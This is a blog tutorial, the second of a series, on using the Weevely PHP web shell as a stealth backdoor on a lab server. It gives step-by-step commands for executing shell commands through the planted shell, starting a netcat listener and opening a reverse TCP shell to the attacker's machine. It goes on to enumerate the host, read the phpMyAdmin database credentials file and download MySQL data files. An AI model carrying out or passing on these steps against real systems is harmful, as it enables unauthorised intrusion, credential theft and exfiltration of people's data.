• 25,450
  • +1,014
  • 2,796
PHP Web Shell and Stealth Backdoor : Weevely 2

PHP Web Shell and Stealth Backdoor : Weevely 2

Bookmark

Today I will continue the second part of how to use the PHP web shell and stealth backdoor : weevely. If you haven’t read my previous post, you can check and see the tutorial here.

The topics for hacking tutorial today is about how to do download the file using weevely php web shell, and also implement the reverse_tcp modules so we can connect directly to the target system to gain as much information as we need.

Step by Step PHP Web Shell and Stealth Backdoor Weevely:

The victim IP address is 192.168.8.94 and attacker IP address is 192.168.8.92

7. Weevely web shell by default has a modules to execute shell :shell.sh <cmd>, but this method was a little bit inconvenient, becauseyou need to declare the module everytime you want to execute the shell.

:shell.sh w

PHP Web Shell and Stealth Backdoor : Weevely

The web shell was there.. ๐Ÿ™‚

The default weevely modules to execute shell is good if you only run a single command like ps, whoami, etc, but if you try to run ls /etc/ it will throw an error.

8. The next step we will do the backdoor modules and will use NetCat to listen for an incoming connection in our attacker computer. Open a new terminal(CTRL + ALT + T) and run this command :

# nc -l -v -p 23

the port I use to listen is 23 (telnet).

9. Back to our Weevely terminal, after NetCat successfully listening on specific port, now we will make a reverse TCP connection to our attacker computer.

:backdoor.reverse_tcp 192.168.8.92 23

PHP Web Shell and Stealth Backdoor : Weevely

after executing the weevely backdoor modules, the terminal where we run the NetCat command to listen was ready to use.

PHP Web Shell and Stealth Backdoor : Weevely

10. Now we will try to collect some useful information from this server.

cat /etc/issue –> find linux distribution type, what version?

cat /proc/version –> what’s the kernel version, is it 64 bit or 32 bit?

PHP Web Shell and Stealth Backdoor : Weevely

you can do more enumeration(collect data) to find out information as much as possible about this server. (I will discuss this on another post)

11. When doing enumeration, I found that this server is a web server with MySQL database and PHPMyadmin installed. Now we will try to read the configuration on this server.

cat /etc/phpmyadmin/config-db.php

PHP Web Shell and Stealth Backdoor : Weevely

12. Oops I’m forget to write down how to download file from this web server to our local directory using weevely php web shell and stealth backdoor ๐Ÿ˜€ . We already know that this server perhaps use MySQL, but we will find out more about the database location in this server.

ps -eo cmd,args | grep mysql

PHP Web Shell and Stealth Backdoor : Weevely

and finally we find that database data directory pointing to /opt/lampp/var/mysql.

13. Now let’s dig into this folder and find whether there’s valuable data or not.

PHP Web Shell and Stealth Backdoor : Weevely

14. Yes there’s some valuable data there ๐Ÿ™‚ , the next step is we need to bring that data into our computer by downloading it.

PHP Web Shell and Stealth Backdoor : Weevely

15. Done ๐Ÿ™‚

hope it useful ๐Ÿ™‚

Subscribe Now To Get The Latest Hacking Tutorial Update on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com